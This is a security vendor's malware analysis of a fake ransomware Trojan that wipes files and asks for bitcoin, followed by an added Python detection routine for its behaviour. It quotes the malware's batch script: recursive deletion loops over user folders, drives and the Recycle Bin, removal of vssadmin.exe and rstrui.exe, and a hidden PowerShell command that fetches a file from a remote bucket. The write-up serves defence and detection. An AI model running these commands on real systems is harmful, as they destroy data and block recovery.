FakeRansom: Deletes files then demands payment for nothing (Jul 15th, 2016)

The SonicWall Threats Research team has observed a new "ransomware" family written by a seemingly lazy author. Ransomware operators normally have a commercial reason to restore files once the victim pays; this "ransomware" does not, and cannot. It deletes everything in its path with no provision for recovery: there is no encryption of files on the system and no key exchange with a remote key server, only a bitcoin address offered in exchange for "retrieving" the deleted files. Unless the victim runs an undelete tool immediately after infection, before the freed disk space is overwritten, the files are permanently lost.

Infection Cycle:

The Trojan makes the following DNS query and attempts to report the infection to the remote server hosted on Amazon Web Services:

The Trojan adds the following files to the filesystem:

  • %APPDATA%\winstrsp.exe [Detected as GAV: FakeRansom.A (Trojan)]
  • %TEMP%\winopen.exewinopen.exe [Detected as GAV: Fakelock.C (Trojan)]
  • %TEMP%\~8.bat

The Trojan sets itself up to run on reboot by registering a scheduled task with schtasks.exe. The file z544 is an XML task definition containing the task data:

The Trojan runs winopen.exewinopen.exe, which displays the following image and shuts the system down within one minute:

It then runs ~8.bat. Below is a sample of the commands in the batch script. Each block changes into a target directory and iterates over `dir /b`, attempting `rmdir /s /q` on every entry and falling back to `del /s /q` when the entry is a file rather than a directory, so nothing listed survives:

      @echo off
      set folder="%AppData%\Local\Temp\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="%USERPROFILE%\Desktop\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="C:\Windows\System32\Restore\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

It also wipes the D: and E: drives (typically removable media or mapped network shares) and empties the Recycle Bin on C:, so that files the user had previously deleted through Explorer cannot be restored either:

      @echo off
      set folder="D:\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="E:\*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set Drive=C:
      if exist %Drive%\$RECYCLE.BIN (
      pushd %Drive%\$RECYCLE.BIN
      del /s /q .
      popd
      )

It deletes the system executables used to manage Volume Shadow Copies and System Restore (vssadmin.exe and rstrui.exe), pausing two seconds after each, so the victim cannot roll the system back to an earlier restore point:

      @echo off
      del "C:\Windows\System32\vssadmin.exe"
      timeout /t 2 /nobreak
      @echo off
      del "C:\Windows\System32\rstrui.exe"
      timeout /t 2 /nobreak

The script also invokes Windows PowerShell, with the execution policy bypassed and the window hidden, to download the payment-instructions image from an Amazon S3 bucket onto the victim's desktop, then attempts to open it with cmd /c and waits 200 seconds:

      @echo off
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/anon.jpg','%USERPROFILE%\Desktop\Payment_Instructions.jpg');
      cmd /c '%USERPROFILE%\Desktop\Payment_Instructions.jpg'
      timeout /t 200 /nobreak
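The behaviour chain described above (scheduled-task persistence via schtasks.exe, deletion of vssadmin.exe and rstrui.exe from System32, a hidden PowerShell download with the execution policy bypassed, and an image launched through cmd /c) expressed as host-based detection logic, run over constructed Sysmon-style events. This is an added example, not SonicWall's code and not the malware's. The events, the task name and the user paths inside them are made up for illustration; field names follow Sysmon (EventID, Image, CommandLine, TargetFilename). Because del and rmdir are internal cmd.exe commands, deleting the restore tools never shows up as a process-creation event, so the example assumes Sysmon file-delete telemetry (Event ID 23), which did not exist when this write-up was published.

```python
"""Indicator matching for the FakeRansom behaviour chain over Sysmon-style events.

Added example (not SonicWall's code). Events are constructed inline using Sysmon
field names; exact paths, the task name and the FileDelete telemetry are assumptions.
"""
import re

# Constructed events modelled on the batch script analysed in the write-up.
# EventID 1 = ProcessCreate, EventID 23 = FileDelete (Sysmon numbering).
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     # task name and XML path are constructed; the post only names the file z544
     "CommandLine": r'schtasks.exe /create /tn "winstrsp" /xml "C:\Users\victim\AppData\Local\Temp\z544"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\Users\victim\AppData\Local\Temp\~8.bat"},
    {"EventID": 23, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Windows\System32\vssadmin.exe"},
    {"EventID": 23, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Windows\System32\rstrui.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden "
                    r"(New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/anon.jpg',"
                    r"'C:\Users\victim\Desktop\Payment_Instructions.jpg')"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c 'C:\Users\victim\Desktop\Payment_Instructions.jpg'"},
    # Benign noise that must not fire: an admin listing shadow copies and querying tasks.
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /query /fo LIST"},
]

# Executables whose removal from System32 disables shadow-copy / restore-point recovery.
RESTORE_TOOLS = {"vssadmin.exe", "rstrui.exe"}

# cmd /c handed a .jpg as the "command": the payment-instructions display step.
CMD_OPENS_IMAGE = re.compile(r"\bcmd(\.exe)?\s+/c\s+'?[^']+\.jpg'?\s*$")


def _basename(path):
    """Last path component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def match_event(ev):
    """Return the indicator names a single event triggers (empty list if none)."""
    hits = []
    eid = ev.get("EventID")
    low = ev.get("CommandLine", "").lower()
    if eid == 23:
        target = ev.get("TargetFilename", "")
        if _basename(target) in RESTORE_TOOLS and "\\system32\\" in target.lower():
            hits.append("restore_tooling_deleted")
    elif eid == 1:
        if _basename(ev.get("Image", "")) == "schtasks.exe" and "/create" in low and "/xml" in low:
            hits.append("schtasks_xml_persistence")
        if "powershell" in low and "-executionpolicy bypass" in low and "downloadfile(" in low:
            hits.append("powershell_bypass_download")
        if CMD_OPENS_IMAGE.search(low):
            hits.append("image_launched_via_cmd")
    return hits


def score_host(events):
    """Distinct indicators observed across all events from one host, sorted."""
    seen = set()
    for ev in events:
        seen.update(match_event(ev))
    return sorted(seen)


def is_fakeransom_chain(events, threshold=2):
    """Treat two or more distinct indicators on one host as a confirmed chain.
    A single indicator (e.g. one schtasks /create /xml) is too common on its own."""
    return len(score_host(events)) >= threshold


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["EventID"], _basename(ev["Image"]), match_event(ev))
    print("chain detected:", is_fakeransom_chain(EVENTS), score_host(EVENTS))
```

The threshold keeps a lone `schtasks /create /xml` (routine in software installers) from paging anyone; the file-delete rule is the high-confidence piece, since nothing legitimate removes vssadmin.exe or rstrui.exe from System32.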

A quick look at the bitcoin address on blockchain.info shows that the operator has made some income, but not much:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeRansom.A (Trojan)
  • GAV: Fakelock.C (Trojan)